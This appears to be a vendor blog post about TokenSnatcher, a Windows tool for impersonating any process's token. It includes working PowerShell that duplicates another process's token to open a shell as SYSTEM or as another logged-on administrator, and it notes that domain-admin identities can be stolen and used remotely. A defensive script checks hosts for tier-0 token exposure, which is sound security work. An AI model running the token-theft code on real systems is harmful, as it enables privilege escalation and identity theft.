Do you sometimes run into situations where being Administrator just doesn’t cut it?
- Trying to access hidden registry keys?
- Trying to remove the godforsaken c:\windows\csc folder?
- Trying to stop a service just to get access denied?
- etc. etc. etc.
One obvious solution would be to elevate your own credentials to System credentials. Running a process as System will allow you to do pretty much anything on the system (so take care!).
Most people facing this challenge will turn to PsExec.exe from Microsoft Sysinternals (typically `psexec -s -i cmd.exe`, which gives you an interactive command prompt running as System).
Here at Easy365Manager we have tremendous admiration for Mark Russinovich, the creator of PsExec. Unlike TokenSnatcher, PsExec is very well tested, and we highly recommend using that tool whenever possible.
However, PsExec does leave a footprint: it copies a service binary (PSEXESVC) to the machine and installs it as a Windows service for the duration of the run. In some cases that may not be desired or possible.
Also, maybe you want to be someone other than System? With TokenSnatcher you can become anyone “dumb enough” to run a process on your system!
How Does TokenSnatcher Work?
TokenSnatcher is a pure executable that doesn’t install anything. It runs under your own account, which must be a member of the local Administrators group, and enumerates every process on the system together with the token each one runs under. Nothing beyond local administrator rights is needed, because Windows grants every administrator SeDebugPrivilege (open any process) and SeImpersonatePrivilege (start a process under a token you hold).
After scanning the processes, TokenSnatcher presents you with a list of all the identities that own processes on your system:
Simply type the number of the identity (process token) you want to snatch, and TokenSnatcher spawns a new command prompt running as that identity.
To confirm your new identity in the spawned command prompt, run `whoami /all`. In the output below you can see that I chose to copy the token of a process running as System:
As seen in the output the process is now running as System.
Any program you start from the new command prompt inherits the selected identity. If you start RegEdit, for example, it will run as System and show the registry keys (such as the contents of HKLM\SAM and HKLM\SECURITY) that are hidden from the local administrator account.
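The same sequence written out as an added PowerShell example (this is not TokenSnatcher's own code, and TokenSnatcher's internals are not published on this page): enumerate the identities behind the running processes, then duplicate one process's primary token with documented Win32 calls and start cmd.exe under it. The function names, the choice of winlogon.exe as a sample target and the `CORP\…` names are assumptions of this example. It must be run from an elevated PowerShell on a host where you are a local administrator.

```powershell
# Added example, not TokenSnatcher's code. Requires an elevated PowerShell
# (member of the local Administrators group); only documented Win32 APIs are used.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Tok {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr hProcess, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hToken, uint access, IntPtr attrs,
                                               int impersonationLevel, int tokenType, out IntPtr hNewToken);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint logonFlags, string app, string cmdLine,
                                                      uint creationFlags, IntPtr env, string cwd,
                                                      ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
}
"@

function Get-ProcessIdentity {
    # TokenSnatcher's "scan": one row per account that owns a process, with a sample
    # PID, preferring a process in the caller's own session (see the note on sessions).
    $mySession = (Get-Process -Id $PID).SessionId
    Get-Process -IncludeUserName | Where-Object UserName | Group-Object UserName | ForEach-Object {
        $pick = @($_.Group | Sort-Object { $_.SessionId -ne $mySession })[0]
        [pscustomobject]@{ Identity = $_.Name; SamplePid = $pick.Id; Process = $pick.ProcessName; Session = $pick.SessionId }
    }
}

function Start-ProcessWithStolenToken {
    param([Parameter(Mandatory)][int]$TargetPid, [string]$CommandLine = 'cmd.exe')

    # An admin token carries SeDebugPrivilege but disabled; enabling it lets
    # OpenProcess succeed on SYSTEM processes and other users' processes.
    [System.Diagnostics.Process]::EnterDebugMode()

    $PROCESS_QUERY_INFORMATION = 0x0400
    $TOKEN_DUPLICATE_QUERY     = 0x0002 -bor 0x0008      # all we need on the victim's token
    $TOKEN_ALL_ACCESS          = 0xF01FF                 # rights on our private copy
    $SecurityImpersonation = 2; $TokenPrimary = 1        # SECURITY_IMPERSONATION_LEVEL / TOKEN_TYPE
    $LOGON_WITH_PROFILE = 1;    $CREATE_NEW_CONSOLE = 0x10

    function Fail($what) {
        $code = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw ("{0} failed: {1}" -f $what, (New-Object ComponentModel.Win32Exception $code).Message)
    }

    $hProc = [Tok]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $TargetPid)
    if ($hProc -eq [IntPtr]::Zero) { Fail 'OpenProcess' }
    $hTok = [IntPtr]::Zero
    if (-not [Tok]::OpenProcessToken($hProc, $TOKEN_DUPLICATE_QUERY, [ref]$hTok)) { Fail 'OpenProcessToken' }
    # The victim's token belongs to its process; we need our own primary token made from it.
    $hDup = [IntPtr]::Zero
    if (-not [Tok]::DuplicateTokenEx($hTok, $TOKEN_ALL_ACCESS, [IntPtr]::Zero,
                                     $SecurityImpersonation, $TokenPrimary, [ref]$hDup)) { Fail 'DuplicateTokenEx' }

    $si = New-Object Tok+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object Tok+PROCESS_INFORMATION
    # Needs SeImpersonatePrivilege (admins have it enabled) and the Secondary Logon service.
    if (-not [Tok]::CreateProcessWithTokenW($hDup, $LOGON_WITH_PROFILE, $null, $CommandLine, $CREATE_NEW_CONSOLE,
                                            [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) { Fail 'CreateProcessWithTokenW' }

    foreach ($h in $pi.hThread, $pi.hProcess, $hDup, $hTok, $hProc) { [void][Tok]::CloseHandle($h) }
    "Spawned PID $($pi.dwProcessId) as the owner of PID $TargetPid; run 'whoami /all' in the new window."
}

# Usage: list the identities, then take the one you want. winlogon.exe in your own
# session is a convenient SYSTEM target; a PID owned by CORP\jolene would make you Jolene.
Get-ProcessIdentity | Format-Table -AutoSize
$mySession = (Get-Process -Id $PID).SessionId
Start-ProcessWithStolenToken -TargetPid (Get-Process winlogon | Where-Object SessionId -eq $mySession)[0].Id
```

The new process lands in the session recorded in the token, so a token taken from a session 0 service gives you a SYSTEM prompt you cannot see; that is why the example prefers a process in your own session. Changing the token's session would need SeTcbPrivilege, which administrators do not have.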
Warning! Privilege Escalation
One thing to notice is that TokenSnatcher lets you take ANY identity (token) that has a process running on your system. This includes the identities of your fellow administrators:
On the system where I’m running TokenSnatcher you can see that Jolene is running PowerShell, Joe is running an MMC (in this case AD Users & Computers) and Jill is running a command prompt.
I can now take over their identities simply (and only) because I am a local administrator on this machine; nothing else is required.
Wait!!! Does that mean:
- Can you steal the identity of a domain admin? YES
- Can the stolen token be used to mess around in Active Directory? YES
- Can you access other servers remotely using the stolen identity? YES, because the token points at the victim’s logon session, and LSASS will use that session’s cached credentials to authenticate you to remote hosts
Oh my … ! Really scary stuff!!!
If you think about it for a few seconds you will understand why you should NEVER allow a lower-tier administrator to be a member of the local Administrators group on a system where higher-tier administrators (or privileged service accounts) run programs. Whoever is local administrator on a machine owns every identity that logs on to it, and that is exactly the reasoning behind tiered administration.
This aspect of Windows security is often overlooked!
It takes a lot of thoughtful planning to protect your admins from identity theft in a large, complex network!
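A way to find the exposure described above on a given host, as an added PowerShell example that is not part of the original post or of TokenSnatcher: it flags a machine where some member of the local Administrators group is not a tier-0 principal while a tier-0 account has a running process (and therefore a stealable token) there. The `$Tier0` list, the `CORP\…` names and the constructed sample run are assumptions; fill the list from your own privileged groups, and note that nested group membership is not expanded here.

```powershell
# Added example, not from the original post. The pure check is separated from the
# data gathering so it can be exercised on constructed input.
function Get-TokenExposure {
    param(
        [string[]]$ProcessOwners,   # accounts that currently own a process on the host
        [string[]]$LocalAdmins,     # members (users or groups) of the local Administrators group
        [string[]]$Tier0            # principals (users or groups) whose tokens must never be exposed
    )
    # -in / -notin compare case-insensitively, which matches how Windows treats account names.
    $tier0WithTokens = @($ProcessOwners | Where-Object { $_ -in $Tier0 } | Sort-Object -Unique)
    $lowerTierAdmins = @($LocalAdmins   | Where-Object { $_ -notin $Tier0 } | Sort-Object -Unique)
    [pscustomobject]@{
        Tier0WithTokens = $tier0WithTokens
        LowerTierAdmins = $lowerTierAdmins
        # Exposed: someone who is not tier 0 can run TokenSnatcher (or its equivalent)
        # here while a tier-0 token is present to be taken.
        Exposed         = ($tier0WithTokens.Count -gt 0) -and ($lowerTierAdmins.Count -gt 0)
    }
}

function Test-TokenExposure {
    # Live version for the local host; run elevated (Get-Process -IncludeUserName needs it).
    param([string[]]$Tier0)
    $owners = Get-Process -IncludeUserName | Where-Object UserName | Select-Object -ExpandProperty UserName -Unique
    $admins = Get-LocalGroupMember -Group 'Administrators' | Select-Object -ExpandProperty Name
    $result = Get-TokenExposure -ProcessOwners $owners -LocalAdmins $admins -Tier0 $Tier0
    $result | Add-Member -NotePropertyName Host -NotePropertyValue $env:COMPUTERNAME -PassThru
}

# Constructed sample mirroring the scenario in the post: Jolene, Joe and Jill (tier 0)
# have processes on a box where helpdesk1 is also a local administrator.
$tier0 = @('CORP\jolene', 'CORP\joe', 'CORP\jill', 'CORP\Domain Admins')
Get-TokenExposure -Tier0 $tier0 `
    -ProcessOwners @('CORP\jolene', 'CORP\joe', 'CORP\jill', 'CORP\helpdesk1', 'NT AUTHORITY\SYSTEM') `
    -LocalAdmins   @('CORP\Domain Admins', 'CORP\helpdesk1', 'WS01\Administrator')
# Expected: Tier0WithTokens = jolene, joe, jill; LowerTierAdmins = helpdesk1, WS01\Administrator; Exposed = True

# Live check on this host:
Test-TokenExposure -Tier0 $tier0
```

To sweep a fleet, run the live function through `Invoke-Command -ComputerName` against your server list and keep only the results where `Exposed` is true; the built-in local Administrator account shows up as a lower-tier admin on purpose, because anyone holding its password has the same power.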
FYI, TokenSnatcher only uses standard, publicly documented Windows API calls. Creatively? For sure! But no funny stuff and no undocumented exploits are going on here.
Technical Deep Dive
If you really want to dive into the technicalities of TokenSnatcher, process tokens and security identity inheritance, have a look at this video:
The video has a technical walkthrough of the theory behind privilege escalation on the Windows operating system.
After the theory you’ll find a demo of TokenSnatcher.
The information in the video should make nice input for your next security team meeting! 😉
Please make sure to read and understand all of the above information before downloading and running TokenSnatcher.
Disclaimer: The software featured in this post is provided as-is. Use entirely at your own discretion.